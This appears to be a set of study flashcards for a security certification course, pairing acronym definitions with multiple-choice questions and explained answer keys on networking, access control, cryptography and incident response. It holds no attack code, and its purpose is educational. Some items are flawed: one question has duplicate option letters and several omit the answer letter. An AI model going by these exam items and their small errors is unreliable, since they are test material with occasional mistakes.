CyberSecurity 601
FISMA
Federal Information Security Management Act
IMAP
Internet Message Access Protocol
RBAC
Role Based Access Control
STIX
Structured Threat Information eXpression
VoIP
Voice over Internet protocol - a phone connection through a personal computer with any type of broadband Internet connection.
MAC
Mandatory Access Control
MTA
Message Transfer Agent
ECB
Electronic Code Book
ICV
Integrity Check Value
ISA
Interconnection Security Agreement
L2TP
Layer 2 Tunneling Protocol
MTD
Maximum Tolerable Downtime
MEF
Mission Essential Functions
DAC
Discretionary Access Control
Port 143
IMAP (Internet Message Access Protocol)
OAuth
Open Authorization
COBIT
Control Objectives for Information and Related Technology
Port 110
POP3 (Post Office Protocol)
SABSA
Sherwood Applied Business Security Architecture
TAP
Test Access Point
ARO
Annualized Rate of Occurrence
API
Application Programming Interface
AH
Authentication Header
CI
Continuous Integration
CTI
Cyber Threat Intelligence
COPE
Corporate Owned, Personally Enabled
CRL
Certificate Revocation List
TOR
The Onion Router
TOTP
Time-based One-Time Password
TCP/IP
Transmission Control Protocol/Internet Protocol
TLS
Transport Layer Security
MitB
man-in-the-browser
SFTP
Secure File Transfer Protocol
COBO
Corporate Owned, Business Only
Which malicious code indicator is a minimal program designed to exploit a buffer overflow? A. Credential dumping B. Persistence C. Lateral movement/insider attack D. Shellcode
D Shellcode is a minimal program designed to exploit a buffer overflow or similar vulnerability to gain privileges, or to drop a backdoor on the host if run as a Trojan. Credential dumping is when malware might try to access the credentials file (SAM on a local Windows workstation) or sniff credentials held in memory by the lsass.exe system process. Lateral movement/insider attack is the general procedure that uses the foothold to execute a process remotely, using a tool such as psexec. Persistence is a mechanism that allows the threat actor's backdoor to restart if the host reboots or the user logs off.
AUP
Acceptable Use Policy
SOAP
Simple Object Access Protocol
XSRF
Cross-Site Request Forgery
CER
Cross-over Error Rate
DH
Diffie-Hellman
NTP
Network Time Protocol
Port 25
SMTP (Simple Mail Transfer Protocol)
SLA
Service Level Agreement
SMTP
Simple Mail Transfer Protocol
WRT
Work Recovery Time
AD
Active Directory
AES
Advanced Encryption Standard
ALE
Annualized Loss Expectancy
ABAC
Attribute-based Access Control
AS
Authentication Service
AIS
Automated Indicator Sharing
BYOD
Bring Your Own Device
CBC
Cipher Block Chaining
NDA
Non-Disclosure Agreement
RPO
Recovery Point Objective
RTO
Recovery Time Objective
ROSI
Return on Security Investment
The IT department head returns from an industry conference feeling inspired by a presentation on the topic of cybersecurity frameworks. A meeting is scheduled with IT staff to brainstorm ideas for deploying security controls by category and function throughout the organization. Which of the following ideas are consistent with industry definitions? (Select all that apply.) A. Deploy a technical control to enforce network access policies. B. Deploy an operational control to monitor compliance with external regulations. C. Schedule quarterly security awareness workshops as a preventive control to mitigate social engineering attacks. D. Deploy agents to file servers to perform continuous backups to cloud storage as a corrective control to mitigate the impact of malware.
A, C, and D A technical control is enforced by computer hardware and software, such as an access control list (ACL) configured on a network firewall. Monitoring of risk and compliance is a type of managerial control, not an operational control. Operational controls are categorized as those performed by people, such as security guards. A preventive control such as user education and training is one that eliminates or reduces the likelihood of an attack before it can take place. A corrective control such as backup is used following an attack to eliminate or mitigate its impact.
An engineer needs to review systems metadata to conclude what may have occurred during a breach. The first step the engineer takes in the investigation is to review MTA information in an Internet header. Which data type does the engineer review? A. Web B. Email C. File D. Cell
B An email's Internet header contains address information for the recipient and sender, plus details of the servers or message Transfer Agents (MTA) handling transmission of the message between them. When a client requests a resource from a web server, the server returns the resource plus headers setting, or describes its properties. File metadata is stored as attributes. The file system tracks when a user creates, accesses, and modifies a file. The user might assign a file with a security attribute, such as marking it as read-only or as a hidden or system file. Mobile phone metadata comprises call detail records (CDRs) of incoming, outgoing, and attempted calls and other data, such as SMS text time.
Artificial intelligence (AI) and machine learning are especially important during which security information and event management (SIEM) task? A. Packet capture B. Analysis and report review C. Data aggregation D. Log collection
B Data captured from network sensors/sniffers plus netflow sources provide both summary statistics about bandwidth and protocol usage and the opportunity for detailed frame analysis. SIEM software can link individual events or data points (observables) into a meaningful indicator of risk, or Indicator of Compromise (IOC). Many SIEM solutions use artificial intelligence (AI) and machine learning as the basis for automated analysis. As distinct from collection, aggregation refers to normalizing data from different sources so that it is consistent and searchable. The first task for SIEM is to collect data inputs from multiple sources, including agent-based log collection, sensor or sniffer data, and listener/collector protocols, such as syslog and Simple Network Management Protocol (SNMP).
During a training event, an executive at a large company asks the security manager trainer why pushing automatic updates as a patch management solution is not ideal for their Enterprise network. How will the security manager most likely respond? A. The security manager pushes updates individually, based on office hours. B. Automatic updates can cause performance and availability issues. C. A patch management suite is impractical for Enterprise networks. D. Next-generation endpoint protection suites perform patch management.
B Enterprise networks need to be cautious about automated deployment, as a patch that is incompatible with an application or workflow can cause availability issues. If multiple applications run update clients on the same host, performance issues may also arise. Scheduling conflicts may influence patch management decisions, but in an enterprise network, a patch management suite, rather than an individual, will handle updates. Endpoint detection and response (EDR) products analyze system data and logs to provide early threat detection. Patch management suites identify, test, and deploy operating system (OS) and application updates. Patches are often classified as critical, security-critical, recommended, and optional.
A network manager needs a map of the network's topology. The network manager is using Network Mapper (Nmap) and will obtain the visual map with the Zenmap tool. If the target IP address is 192.168.1.1, determine the command within Nmap that will return the necessary data to build the visual map of the network topology. A. nmap -sn --ipconfig 192.168.1.1 B. nmap -sn --ifconfig 192.168.1.1 C. nmap -sn --traceroute 192.168.1.1 D. nmap -sn --nslookup 192.168.1.1
C The traceroute command is used to probe a path from one end system to another, and lists the intermediate systems providing the link. The Nmap combined with Zenmap tools will give a visual of the network topology. The ipconfig and ifconfig commands are used for looking at the configuration of a system's network adapter. The primary difference between the ipconfig and ifconfig commands are the type of systems the network is using. The ipconfig is designed for Windows, while the ifconfig is designed for use on Linux systems. The nslookup command is used to query the Domain Name System (DNS).
A security analyst needs to contain a compromised system. The analyst would be most successful using which containment approach? A. Black hole B. VLAN C. ACL D. Air gap
D A simple option is to disconnect the host from the network completely (creating an air gap) or disabling its switch port. This is the least stealthy option and may reduce opportunities to analyze the attack or malware due to the isolation. The analyst can implement a routing infrastructure to isolate one or more infected virtual LANs (VLANs) in a black hole that is not reachable from the rest of the network. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture such as VLANs. ACLs can prevent a host or group of hosts from communicating outside of a protected segment.
Which method might an attacker use to redirect login via information gained by implementing JavaScript on a webpage the user believes is legitimate? A. Man-in-the-Browser (MitB) B. Confused deputy C. Reflected D. Clickjacking
D Clickjacking is an attack characterized as a difference between what a user sees and trusts as a web application with a login page or form, and the reality of the page or form containing a malicious layer or invisible iFrame, allowing an attacker to intercept or redirect user input. A Man-in-the-Browser (MitB) attacks occur when the web browser is compromised by installing malicious plugins or scripts or intercepting API calls between the browser process and a Dynamic Link Library (DLL). If a target site assumes the browser is authenticated because there is a valid session cookie and does not complete any additional authorization process, a confused deputy attack has occurred. A reflected attack exploits vulnerabilities on the server-side script and is one of the most powerful input validation exploits. It involves a trusted site, a client browsing the trusted site, and the attacker's site.
Evaluate the following choices based on their potential to lead to a network breach. Select the choice that is NOT a network architecture weakness. A. The network architecture is flat. B. Services rely on the availability of several different systems. C. The network relies on a single hardware server. D. Not all hosts on the network can talk to one another.
D It is good that not all the hosts can talk to each other. If any host can contact another host, an attacker can penetrate the network edge and gain freedom of movement. A flat architecture is where all hosts can contact each other, exposing an overdependence on perimeter security. When services rely on several different systems, the failure of one will affect the overall performance of other network services. Relying on a single hardware server represents a single point of failure, meaning the whole network crashes if the server goes down.
Which scripting language is the preferred method of performing Windows administration tasks? A. Javascript B. Python C. Ruby D. Powershell
D Powershell is the preferred method of performing Windows administration tasks. Javascript is the programming language of the web and is one of the most popular programming languages. Python is a popular language for implementing all kinds of development projects, including automation tools and security tools, as well as malicious scripts. Ruby is a dynamic, open source programming language with a focus on simplicity and productivity. It has an elegant syntax that is natural to read and easy to write.
A systems engineer configures a disk volume with a Redundant Array of Independent Disks (RAID) solution. Which solution does the engineer utilize when allowing for the failure of two disks? A. Level 1 B. Level 0 C. Level 5 D. Level 6
D Redundant Array of Independent Disks (RAID) Level 6 has double parity or Level 5 with an additional parity stripe. This allows the volume to continue when two disks have been lost. Level 1 uses mirroring where data is written to two disks simultaneously, which provides redundancy. The main drawback is its storage efficiency is only 50%. RAID Level 0 is striping without parity resulting in no fault tolerance. Data is written in blocks across several disks. RAID Level 5 has striping with parity. Data is written across three or more disks but calculates additional information. This allows the volume to continue if one disk is lost. This solution has better storage efficiency than RAID 1.
A system administrator uses a Graphical User Interface (GUI) remote administration tool over TCP port 3389 to manage a server operating Windows 2016. Evaluate the types of remote administration tools to conclude which protocol the administrator is using. A. Secure Shell B. Telnet C. Dynamic Host Configuration Protocol D. Remote Desktop
D Remote Desktop Protocol (RDP) is Microsoft's protocol for operating remote connections to a Windows machine. RDP uses TCP port 3389. Secure Shell (SSH) is the principal means of obtaining secure remote access to a UNIX or Linux server. Telnet is terminal emulation software to support a remote connection to another computer and uses TCP port 23 by default. Telnet is not secure but can be used over a secure channel, such as an IPSec tunnel. The Dynamic Host Configuration Protocol (DHCP) provides an automatic method for network address allocation.
Data exists in several states, each requiring different security considerations. Evaluate the following items and select which data state presents the greatest risk due to decryption. A. Data in use B. Data in transit C. Data in motion D. Data at rest
A Data in use is when data is present in volatile memory. When a user works with data, that data needs to be decrypted, which puts it at risk. Transmitting data over a network refers to data in transit. The encryption challenge is not as great as with data in use. Data in motion is another name for data in transit. When data is at rest, it is usually possible to encrypt the data using a variety of techniques, such as whole disk encryption, database encryption, and file- or folder-level encryption.
An individual contacts a company's IT department, threatening to exploit a vulnerability found in the company's security infrastructure if the company does not pay a bounty. Upon further investigation, the IT team discovers that the individual threatening the company used crude scripts in the hacking attempt, which they easily managed. Which statement best describes the disparity between the hacker's claim and the hacker's real capability? A. The hacker presents as a black hat, but the individual's capabilities indicate the hacker is a script kiddie. B. The hacker claims to be a white hat, but the threatening demeanor and capabilities represent those of a black hat hacker. C. The hacker presents as a script kiddie, but the threatening demeanor and capabilities indicate a black hat hacker. D. The hacker presents as a gray hat hacker, but the individual's capabilities indicate a script kiddie.
A. The term hacker describes an individual who has the skills to gain access to computer systems through unauthorized or unapproved means. A black hat hacker acts with malicious intent. A script kiddie is someone that uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. A white hat hacker has technical skill and creativity, but non-malicious intent. Technical skill and creativity distinguish a hacker from a script kiddie. A hacker excels at computer programming and computer system administration, while a script kiddie uses hacker tools without the ability to craft new attack methods. Gray hat hackers will not generally extort a target but may offer services after revealing a vulnerability.
ACL
Access Control List
A systems breach occurs at a manufacturer. The system in question contains highly valuable data. An engineer plans a live acquisition, but ultimately, is not successful. What reason may be stopping the engineer? A. There is no hibernation file present B. The tools are not preinstalled or running C. The crash dump file is missing D. The pagefile is corrupt
B A specialist hardware or software tool can capture the contents of memory while the host is running (live acquisition). This type of tool needs to be pre-installed or a standalone executable needs to be run, as it requires a kernel mode driver to dump any data of interest. When a Windows host is in a sleep state, the system creates a hibernation file on disk in the root folder of the boot volume. This file is not a prerequisite for a live acquisition. When Windows encounters an unrecoverable kernel error, it can write contents of memory to a dump file. This file is not a prerequisite for a live acquisition. The pagefile/swap file/swap partition stores pages of memory in use that exceed the capacity of the host's RAM modules. This file is not a prerequisite for a live acquisition.
The _____ requires federal agencies to develop security policies for computer systems that process confidential information. A. Sarbanes-Oxley Act (SOX) B. Computer Security Act C. Federal information Security Management Act (FISMA) D. Gramm-Leach-Bliley Act (GLBA)
B The Computer Security Act (1987) specifically requires federal agencies to develop security policies for computer systems that process confidential information. The Sarbanes-Oxley Act (2002) mandates the implementation of risk assessments, internal controls and audit procedures. This act is not for any specific entity. The Federal Information Security Management Act (2002) governs the security of data processed by federal government agencies. This act requires agencies to implement an information security program. The Gramm-Leach-Bliley Act (1999) is a United States federal law that requires financial institutions to explain how they share and protect their customers' private information.
A security team uses passive scanning to gather information and data related to a suspected rogue system on a network. By using passive scanning, what type of information does the team gather? A. Credentialed B. Indirect evidence C. Embedded D. Report
B. Non-intrusive (or passive) scanning means analyzing indirect evidence, such as the types of traffic generated by a device. A credentialed scan (whether passive or active) is given a user account with logon rights to various hosts, plus whatever other permissions are appropriate. These credentials allow access to protected information. Embedded refers to a system type, such as VoIP phones, where the OS is built in to the system. This system types are prone to crashing if being scanned. Report data is available from many scanning systems which use databases of known software and configuration vulnerabilities. Reports may include information about each vulnerability in the database.
CA
Certificate Authority
CTM
Counter-Mode
CSF
Cybersecurity Framework
Identify the command that can be used to detect the presence of a host on a particular IP address. A. ipconfig B. ifconfig C. ip D. ping
D The ping command can be used to detect the presence of a host on a particular IP address or that responds to a particular host name. This command is a fast and easy way to determine if a system can communicate over the network with another system. The ipconfig command is used to report the configuration assigned to the network adapter in Windows. The ifconfig command can be used to report the adapter configuration in Linux. The ip command is a more powerful command in Linux and gives options for managing routes as well as the local interface configuration.
DNSSEC
Domain Name System Security Extensions
DLL
Dynamic Link Library
EKU
Extended key usage
FAR
False Acceptance Rate
FDE
Full Disk Encryption
LDAP
Lightweight Directory Access Protocol
Nmap
Network Mapper
OTP
One-time password
TCP Port 3389
RDP (Remote Desktop Protocol)
SOX
Sarbanes-Oxley Act
S/MIME
Secure/Multipurpose Internet Mail Extensions
SAML
Security Assertions Markup Language
SIEM
Security Information and Event Management
SDN
Software Defined Networking
SDLC
Software Development Life Cycle
SAN
Storage Area Network
TKIP
Temporal Key Integrity Protocol
TACACS+
Terminal Access Controller Access Control System Plus
A cloud server has been breached. The organization realizes that data acquisition differs in the cloud when compared to on-premises. What roadblocks may the organization have to consider when considering data? (Select all that apply.) A. On-demand services B. Jurisdiction C. Chain of custody D. Notification laws
The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Jurisdiction and data sovereignty may restrict what evidence the CSP is willing to release to the organization. Chain of custody issues are complex as it may have to rely on the CSP to select and package data for the organization. If the CSP is a data processor, it will be bound by data breach notification laws and regulations. This issue does not relate to the acquisition of data.
Key Life Cycle
The stages are: key generation, certificate generation, storage, revocation, and expiration and renewal.
VPC
Virtual Private Cloud
WS
Web Services
WPA
WiFi Protected Access
A systems manager creates a control diversity plan to enact a defense in depth approach to security. To mitigate any possible risk of a virus infection, the plan includes which physical and administrative controls? (Select all that apply.) A. User training B. USB port locks C. Restricted permissions D. Endpoint security
A and B User training (an administrative control) may ensure that a USB drive is not inserted into a computer system without scanning it first. Security locks inserted into USB ports (physical control) on a system could prevent malicious activity by denying the attachment of media without first requesting a key. Permissions restricting a user account (a technical control) could prevent any malware from executing successfully. This includes such as being able to install software. Endpoint security software (a technical control) on a system could scan for malware or block access automatically. Endpoint security can monitor a system at all times.
Xander sends a malicious file via email attachment to employees at a target company, hoping at least one employee will open the malicious file that will propagate through the company's network and disrupt the company's operations. If Xander's goal is disruption of company operations, what does this describe? A. intent B. motivation C. risk D. threat
A. Intent describes what an attacker hopes to achieve from the attack, while motivation is the attacker's reason for perpetrating the attack. A malicious threat actor's motivation could be greed, curiosity, or some sort of grievance. The intent could be to vandalize and disrupt a system or to steal something. Risk is the likelihood and impact of a threat actor exploiting a vulnerability. To assess risk, one must identify a vulnerability and then evaluate the likelihood of exploiting it by a threat and the impact that a successful exploit would have. A threat is the potential for someone or something to exploit a vulnerability and breach security.
An engineer configures a proxy to control access to online content for all users in an organization. Which proxy type does the engineer implement by using an inline network appliance? (Select all that apply.) A. Non-transparent B. Transparent C. Intercepting D. Application
B and C A transparent proxy must be implemented on a switch, router, or other inline network appliance. An intercepting proxy (known as a transparent proxy) is configured to intercept client traffic without the client having to be reconfigured. A non-transparent proxy configuration means that the client must be configured with the proxy server address and port number to use it. Proxy servers can be application-specific; others are multipurpose. A multipurpose proxy is one configured with filters for multiple protocol types. In this case, the target is not a specific application.
Identify the true statements about supervisory control and data acquisition (SCADA) systems. (Select all that apply.) B. SCADA systems typically communicate with one another through LAN connections. B. SCADA systems typically run as software on ordinary computers, gathering data from and managing field devices. C. SCADA systems are purpose-built devices that prioritize IT security features. D. SCADA systems serve primarily industrial, manufacturing, utility, and logistics sectors.
B and D SCADA typically runs as software on ordinary computers, gathering data from and managing plant devices and equipment, with embedded PLCs, referred to as field devices. Many sectors of industry, including utilities, industrial processing, fabrication and manufacturing, logistics, and facilities management use these types of systems. SCADA typically use WAN communications, such as cellular or satellite, to link the SCADA server to field devices. ICS/SCADA was historically built without regard to IT security, though there is now high awareness of the necessity of enforcing security controls to protect them, especially when they operate in a networked environment.
A security manager configures an access control list (ACL) to enumerate permissions to data resources. Evaluate the control measure and determine to what state of data the control applies. A. Data in transit B. Data in processing C. Data in encryption D. Data at rest
D ACLs ensure only authorized users can read or modify data. ACLs can be applied only if access to the data is fully mediated through a trusted OS. Data in transit or data in motion describes data while it is transmitting over a network, such as a website or remote access traffic. Transport encryption protocols, such as TLS or IPSec protect data in transit. Data in use or data in processing is present in volatile memory, such as system RAM or CPU registers and cache. Data in use may stay decrypted for an entire work session, which puts it at risk. Trusted execution environment (TEE) mechanisms encrypt data as it exists in memory, so that an untrusted process cannot decode the information.
EF
Exposure Factor
Which microwave connection mode is most appropriate for forming a strong connection between two sites? A. P2P B. P2M C. OTA D. OTG
A A point-to-point topology occurs when two nodes have a dedicated connection to one another. In a point-to-multipoint topology, a central node mediates links between remote nodes. Point-to-multipoint (P2M) microwave uses smaller sectoral antennas, each covering a separate quadrant. Where P2P is between two sites, P2M links multiple sites or subscriber nodes to a single hub. Over-the-air (OTA) firmware updates are delivered to radio devices via a cellular data connection. The USB on the go (OTG) specification allows a mobile device to act as a host when a device, such as an external drive or keyboard, is attached. USB OTG allows a port to function either as a host or as a device.
A networking administrator is reviewing available security products to further fine-tune the existing firewall and appliance settings. An administrator should analyze which system logs in order to tune firewall rulesets and remove or block suspect hosts and processes from the network? A. Network-based intrusion detection system (NIDS) B. Unified threat management (UTM) product C. Network-based intrusion prevention system (IPS) D. Network behavior and anomaly detection (NBAD) product
A Analyzing NIDS logs allows an administrator to tune firewall rulesets, remove or block suspect hosts and processes from the network, or deploy additional security controls to mitigate any identified threats. A Unified threat management (UTM) product centralizes many types of security controls into a single appliance. A UTM might not perform as well as software or a device with a single dedicated security function. Compared to the passive function of an IDS, an intrusion prevention system (IPS) can provide an active response to any network threats that it matches. An NBAD engine uses heuristics to generate a statistical model baseline normal traffic. The system generates false positives and false negatives until it improves its statistical model of what is "normal."
Which of the following statements differentiates between input validation and output encoding? A. Input validation ensures that data input into an application is in a compatible format for the application, while output encoding re-encodes data that transfers between scripts. B. Input validation is a server-side validation method, while output encoding is a client-side validation method. C. Output encoding is a server-side validation method, while input validation encoding is a client-side validation method. D. Input validation forces the browser to connect using HTTPS only, while output encoding sets whether the browser can cache responses.
A Input validation ensures that an application can appropriately handle the data entered into a field or variable in the application. Output encoding occurs when a script passes data to another script. Output encoding ensures it is not passing any malicious "script" contents. Input validation occurs when a script takes data passed to it by some other process. Client-side code, server-side code, or both, can perform input validation. Output encoding avoids the assumption that input will have been sanitized already. HTTP Strict Transport Security (HSTS) forces a browser to connect using HTTPS only, mitigating downgrade attacks, such as SSL stripping. Cache-control sets whether the browser can cache responses.
Where should an administrator place an internet-facing host on the network? A. DMZ B. Bastion host C. Extranet D. Private network
A Internet-facing hosts reside in one or more Demilitarized Zones (DMZs), or perimeter networks. Traffic can not pass through a DMZ, but it enables external clients to access data on private systems, such as web servers, without compromising the security of the entire internal network. Bastion hosts reside in a DMZ and are not fully trusted by the internal network due to the possibility of Internet compromise. An extranet is a network of semi-trusted hosts, typically representing business partners, suppliers, or customers. Hosts must authenticate to join the extranet. A private network or intranet is a network of trusted hosts owned and controlled by the organization. It should never be Internet-facing.
When using a digital envelope to exchange key information, the use of what key agreement mitigates the risk inherent in the Rivest-Shamir-Adleman (RSA) algorithm, and by what means? A. Perfect forward secrecy (PFS) uses Diffie-Hellman (DH) key agreement to create ephemeral session keys without using the server's private key. B. The Cipher Block Chaining (CBC) key agreement mode uses an initialization vector (IV) to create ephemeral session keys without using the server's private key. C. Counter mode in key agreement makes the advanced encryption standard (AES) algorithm work as a stream cipher, by applying an initialization vector to issue a security certificate. D. A certificate authority (CA) validates the public key's owner and creates an initialization vector to protect the exchange from snooping.
A Perfect forward secrecy (PFS) mitigates the risk from RSA key exchange, using Diffie-Hellman (D-H) key agreement to create ephemeral session keys without using the server's private key. Modes of operation refer to AES use in a cipher suite. Cipher Block Chaining (CBC) mode applies an initialization vector (IV) to a chain of plaintext data and uses padding to fill out blocks of data. Counter mode makes the AES algorithm work as a stream cipher. Each block of data can be processed individually and in parallel, improving performance. A certificate authority (CA), validates the owner of a public key, issuing a signed certificate. The process of issuing and verifying certificates is called public key infrastructure (PKI).
Arrange the following stages of the incident response life cycle in the correct order. A. Preparation; Identification; Containment, Eradication, and Recovery; Lessons Learned B. Identification; Preparation; Containment, Eradication, and Recovery; Lessons Learned C. Containment, Eradication, and Recovery; Identification; Preparation; Lessons Learned D. Identification; Containment, Eradication, and Recovery; Preparation; Lessons Learned
A Stage 1. Preparation requires making the system resilient to attack in the first place (hardening systems, writing policies and procedures, and establishing confidential lines of communication). Stage 2. Identification involves determining whether an incident has taken place and assessing how severe it might be, followed by notification of the incident to stakeholders. Stage 3. Containment, Eradication, and Recovery are limiting the scope and impact of the incident. Once the incident is contained, the cause can then be removed and the system brought back to a secure state. Stage 4. Lessons learned consists of analyzing the incident and responses to identify whether procedures or systems could be improved. It is imperative to document the incident.
When a network uses Extensible Authentication Protocol (EAP) as the authentication method, what access control standard restricts local traffic to authentication data when a client connects over a Virtual Private Network (VPN) gateway A. IEEE 802.1X B. Kerberos C. Terminal Access Controller Access-Control System Plus (TACACS+) D. Remote Authentication Dial-in User Service (RADIUS)
A The IEEE 802.1X Port-based Network Access Control (NAC) standard provides the means of using an EAP method when a device connects to a VPN gateway. With 802.1X, the network access server (NAS) device accepting remote connections does not have to store any authentication credentials. The network access server forwards only EAP authentication data between the authentication server (implemented by TACACS+ or RADIUS) and the supplicant requesting remote access. Full network access is only granted once the supplicant has been authenticated. Kerberos is designed to work over a trusted local network. Different authentication protocols have been developed to work with remote access protocols, where the connection is made over a serial link or virtual private network (VPN). TACACS+ can implement the authentication server role, but does not provision the full set of supplicant, authenticator and authentication server roles required for a VPN topology. Also, TACACS+ is more commonly used to authenticate administrative access to network appliances than to authenticate remote access VPNs. RADIUS can implement the authentication server role, but does not provision the full set of supplicant, authenticator and authentication server roles required for a VPN topology.
A technician is configuring Internet Protocol Security (IPSec) for communications over a Virtual Private Network (VPN). Evaluate the features of available modes and recommend the best option for implementation. A. Tunnel mode because the whole IP packet is encrypted, and a new IP header is added. B. Transport mode because the whole IP packet is encrypted, and a new IP header is added. C. Tunnel mode because the payload is encrypted. D. Transport mode because the payload is encrypted.
A The technician should use tunnel mode because the whole IP packet, including header and payload, is encrypted and a new IP header added. This mode is used for communications across an unsecure network (creating a VPN). In transport mode, the IP header for each packet is not encrypted, just the data (payload). This mode is used for secure communications on a private network (an end-to-end implementation). In tunnel mode, the header and the payload are encrypted. In transport mode, the payload is encrypted but this does not provide sufficient security for a VPN.
A network administrator conducts a network assessment to determine where to implement a network intrusion detection system (NIDS). Which sensor deployment option is most ideal if the admin is concerned about system overloads and resiliency in the event of power loss? A. Passive test access point (TAP) B. Active test access point (TAP) C. Aggregation test access point (TAP) D. Switched port analyzer (SPAN)/mirror port
A With a passive TAP, the monitor port receives every frame—corrupt, malformed, or not—and load does not affect copying. Because it performs an active function, an active TAP becomes a point of failure for the links in the event of power loss. When deploying an active TAP, it is important to use a model with backup power options. Aggregation TAPs rebuild the upstream and downstream channels into a single channel, but these can drop frames under very heavy load. SPAN/mirror port sensor is not completely reliable, as frames with errors will not be mirrored and frames may be dropped under heavy load.
Compare the features of static and dynamic computing environments and then select the accurate statements. (Select all that apply.) A. Embedded systems are typically static computing environments, while most personal computers are dynamic computing environments. B. Dynamic computing environments are easier to update than static computing environments. C. Dynamic computing environments give less control to users than static computing environments. D. Dynamic computing environments are easier to secure than static computing environments.
A and B An embedded computing environment is a complete computer system that is designed to perform a specific, dedicated function. A PC is a dynamic computing environment where the user can add or remove programs and data files. A dynamic computing environment provides users more control to perform actions like install or update applications. A static computing environment update will usually only be available through specific management interfaces. A static computing environment gives less control than a dynamic computing environment. Each embedded system may differ in how each one is handled or maintained, and therefore may require more manual tasks than dynamic systems. A static computing environment is easier to protect. This is due to the unchanging environment without adding new hardware or software. With fewer changes and additions, the systems are not introduced to as many threats.
A systems engineer decides that security mechanisms should differ for various systems in the organization. In some cases, systems will have multiple mechanisms from multiple sources. Which types of diversity does the engineer practice? (Select all that apply.) A. Control B. Vendor C. Change D. Resiliency
A and B Control diversity means that the layers of controls should combine different classes of technical and administrative controls with the range of control functions. Vendor diversity means that security controls are sourced from multiple sources. A vulnerability in solutions from a single vendor approach is a security weakness. Change refers to control processes or management. Control involves careful planning, with consideration for how the change will affect dependent components. Enterprise-level networks often provision resiliency at the site level. An alternate processing or recovery site is a location that can provide the same (or similar) level of service. Resiliency itself does not provide diversity.
Select the explanations that accurately describe the Ticket Granting Ticket (TGT) role within the Authentication Service (AS). (Select all that apply.) A. The client sends the AS a request for a TGT that is composed by encrypting the date and time on the local computer with the user's password hash as the key. B. The AS responds with a User Ticket that contains information about the client. This includes the name and IP address of the client, plus a timestamp and validity period. C. The AS responds with a TGT key for use in communications between the client and the Ticket Granting Service (TGS). D. The TGT responds with a service session key for use between the client and the application server.
A and B The Authentication Service (AS) is responsible for authenticating user logon requests. The first step within AS is when the client sends the AS a request for a Ticket Granting Ticket (TGT). This is composed by encrypting the date and time on the local computer with the user's password hash as a key. A User Ticket contains information about the client and includes a timestamp and validity period. The information is encrypted using the KDC's secret key. This occurs after the user is found in the database and the request is valid. The AS does not respond back with a TGT key but with a Ticket Granting Service (TGS) key that is used in communications between the client and the TGS. The TGS is the service that responds with a service session key for use between the client and the application server.
Examine the differences between general purpose personal computer hosts and embedded systems and select the true statements regarding embedded system constraints. (Select all that apply.) A. Many embedded systems work on battery power, so they cannot require significant processing overhead. B. Many embedded systems rely on a root of trust established at the hardware level by a trusted platform module (TPM). C. Embedded systems often use the system on chip (SoC) design to save space and increase power efficiency. D. Most embedded systems are based on a common but customizable design, such as FPGA.
A and C Many embedded devices are battery-powered and may need to run for years without having to replace the cells. Processing must be kept to the minimum possible level. Embedded systems often use system on chip (SoC), a design where processors, controllers, and devices reside on a single processor die (or chip). This packaging saves space and is usually power efficient. TPM establishes a root of trust at the hardware level on PC, but most embedded systems do not have embedded TPMs, so they must rely on implicit trust and network perimeter security. A field programmable gate array (FPGA) is a type of controller that allows the end customer to configure the programming logic of the device to run a specific application.
A system administrator is deploying a new web server. Which hardening procedures should the administrator consider? (Select all that apply.) A. The administrator should use SFTP to transfer files to and from the server remotely. B. Any guest web access that exist on the webserver should be disabled or removed. C. The administrator should assign a digital certificate and enable the use of TLS 1.3. D. The configuration templates contain vulnerabilities, and the administrator should not utilize them.
A and C Secure file transfer protocol (SFTP) safely transfers files remotely via SSH. Transport layer security (TLS) enables secure communication between the client and the web server. This is implemented by assigning a certificate to the web server. TLS 1.3 prevents downgrade attacks. Most web servers must allow for secure access to guest web access. Guest web access should only be allowed to view content in the website and not from any other web server directory. Web servers should deploy using configuration templates where possible.
An organization suspects that a visitor is performing data exfiltration while on the premises. The organization knows that the visitor does not have physical access to any computer system. Which of the following methods does the organization suspect the visitor of using? (Select all that apply.) A. Phone B. USB C. Remote access D. Camera
A and D Data exfiltration can happen by communicating information orally over a telephone, cell phone, or Voice over IP (VoIP) network. Cell phone text messaging is another possibility. Copying the data to removable media or other devices with storage, such as USB drive, the memory card in a digital camera, or a smartphone is not possible as the visitor has no access to computer systems. Using a network protocol, such as HTTP, FTP, SSH, email, or remote access is useful for data exfiltration. Remote access is not possible as the visitor has no access to computer systems. A camera can capture images or video of data. This data may be computer data. Since the visitor has no access to computer systems, other targets may be paper documents, post-it notes on desks, building layouts, and more.
An engineer creates a set of tasks that queries information and runs some PowerShell commands to automate several stages of the process, including the identification of threats and other malicious activity on multiple servers. The engineer defines these tasks using which of the following? A. Runbook B. Playbook C. Orchestration D. Automation
A runbook aims to automate as many stages of the playbook as possible, while leaving clearly defined interaction points for human analysis. A playbook is a type of list usually referred to as an incident response workflow. A playbook is a checklist of actions to perform, to detect and respond to a specific type of incident. Orchestration is the action of coordinating multiple automations (and possibly manual activity) to perform a complex, multistep task. Automation, unlike orchestration, is the action of scripting a single activity.
Consider the role trust plays in federated identity management and determine which models rely on networks to establish trust relationships. (Select all that apply.) A. SAML B. OAuth C. OpenID D. LDAP
A, B, and C Security Assertion Markup Language (SAML) is an identity federation format used to exchange authentication information between the principal, the service provider, and the identity provider. Authentication and authorization for a RESTful API is often implemented using the Open Authorization (OAuth) protocol. OpenID is an identity federation method enabling users authentication on cooperating websites by a third-party authentication service. Lightweight Directory Access Protocol (LDAP) is not an identity federation. It is a network protocol used to access network directory databases storing information about authorized users and their privileges, as well as other organizational information.
A system administrator is configuring a new Dynamic Host Configuration Protocol (DHCP) server. Consider the various types of attacks specific to DHCP and determine which steps the system administrator should take to protect the server. (Select all that apply.) A. Use scanning and intrusion detection to pick up suspicious activity. B. Disable DHCP snooping on switch access ports to block unauthorized servers. C. Enable logging and review the logs for suspicious events. D. Disable unused ports and perform regular physical inspections to look for unauthorized devices.
A, C, and D The system administrator should use scanning and intrusion detection to pick up suspicious activity. The system administrator should set logging to be enabled and then review the logs regularly for suspicious events. The system administrator should disable unused ports and perform regular physical inspections to ensure that unauthorized devices are not connected via unused jacks. The system administrator should enable DHCP snooping on switch access ports to prevent the use of unauthorized DHCP servers. DHCP snooping acts as a firewall between the server and untrusted hosts and should be enabled versus disabled.
